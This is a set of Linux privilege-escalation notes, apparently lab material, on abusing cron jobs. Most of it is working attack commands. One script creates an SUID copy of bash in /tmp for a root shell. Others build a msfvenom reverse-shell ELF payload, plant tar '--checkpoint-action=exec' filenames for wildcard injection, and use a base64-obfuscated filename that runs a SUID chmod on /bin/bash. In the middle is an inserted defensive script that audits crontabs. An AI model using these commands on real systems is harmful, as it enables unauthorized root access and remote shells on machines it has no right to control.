LSE
./lse.sh -l 1 -i | more
File permissions
View the content of system-wide crons
cat /etc/crontab
Locate the file that is running as part of crontab
locate filename
Check the permission of the file
ls -l filename
Change the content of the file if there is write access
#!/bin/bash
reverse shell here
PATH Environment variable
- The crontab PATH environment variable is by default set to /usr/bin:/bin.
- The PATH variable can be overwritten in the crontab file.
- If a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job.
View the contents of the system-wide crontab:

Note that the /home/user directory (which we can write to) is at the start of the PATH variable, and the first cron job does not use an absolute path.
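The two weaknesses described so far (a cron-run script that can be modified, and a relative command resolved through a writable PATH directory) can be audited from the defender's side. The script below is an added example, not part of the original notes; the function names, the TRUSTED_UID variable and the sample tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit a system crontab for writable job scripts and hijackable relative commands.
TRUSTED_UID=${TRUSTED_UID:-0}   # assumption: only this uid should own cron-run paths

# unsafe P: true if P exists and is group/world-writable or not owned by TRUSTED_UID
unsafe() {
    [ -e "$1" ] && [ -n "$(find -H "$1" -prune \
        \( ! -user "$TRUSTED_UID" -o -perm -0020 -o -perm -0002 \) )" ]
}

# audit_crontab FILE: print one finding per line (system crontab format, with user field)
audit_crontab() {
    file=$1 cron_path=/usr/bin:/bin            # cron's default PATH
    while IFS= read -r line; do
        case $line in
            PATH=*) cron_path=${line#PATH=}; continue ;;   # unquoted value assumed
            [A-Za-z_]*=*) continue ;;                      # other environment settings
        esac
        set -f; set -- $line; set +f           # split fields without expanding '*'
        case $1 in '#'*) continue ;; @*) n=2 ;; *) n=6 ;; esac
        [ $# -gt "$n" ] || continue            # blank or malformed line
        shift "$n"; cmd=$1                     # first word after schedule and user
        case $cmd in
            /*) if unsafe "$cmd" || unsafe "$(dirname "$cmd")"; then echo "WRITABLE_SCRIPT $cmd"; fi ;;
            *)  old_ifs=$IFS; IFS=:
                for d in $cron_path; do        # same order cron searches
                    if unsafe "$d"; then echo "HIJACKABLE $cmd via $d"; fi
                    if [ -x "$d/$cmd" ]; then break; fi   # real program found, later dirs unused
                done
                IFS=$old_ifs ;;
        esac
    done < "$file"
    return 0
}

# Constructed sample tree and crontab (not real system data)
demo_audit() {
    t=$(mktemp -d); b=$t/usr/local/bin; TRUSTED_UID=$(id -u)   # current user stands in for root
    mkdir -p "$t/home/user" "$b"; chmod 777 "$t/home/user"; chmod 755 "$b"
    printf '#!/bin/sh\n' | tee "$b/overwrite.sh" > "$b/backup.sh"
    chmod 755 "$b/overwrite.sh"; chmod 777 "$b/backup.sh"
    printf '%s\n' "PATH=$t/home/user:$b:/usr/bin:/bin" \
        "* * * * * root overwrite.sh" \
        "* * * * * root $b/backup.sh" > "$t/crontab"
    audit_crontab "$t/crontab"; rm -rf "$t"
}
demo_audit
```

On a real host, run audit_crontab /etc/crontab with TRUSTED_UID left at 0. The fix for each finding is an absolute path in the job line, a PATH containing only root-owned directories, and root-only write permission on the script and its directory.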
Exploit
- Create the file overwrite.sh in /home/user with the following contents:
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
chmod +x /tmp/rootbash
- Make it executable
chmod +x /home/user/overwrite.sh
- Once the /tmp/rootbash file is created, execute it (with -p to preserve the effective UID) to gain a root shell:
cd /tmp
./rootbash -p
Wildcards
- View the contents of the system-wide crontab

- Use msfvenom to create a reverse shell ELF payload:
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=53 -f elf -o shell.elf
- Copy the file to the /home/user directory on the remote host and make it executable:
chmod +x /home/user/shell.elf
- Create two files in the /home/user directory:
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf
Find -exec


touch /dev/shm/'$(echo -n Y2htb2QgdStzIC9iaW4vYmFzaA==|base64 -d|bash)'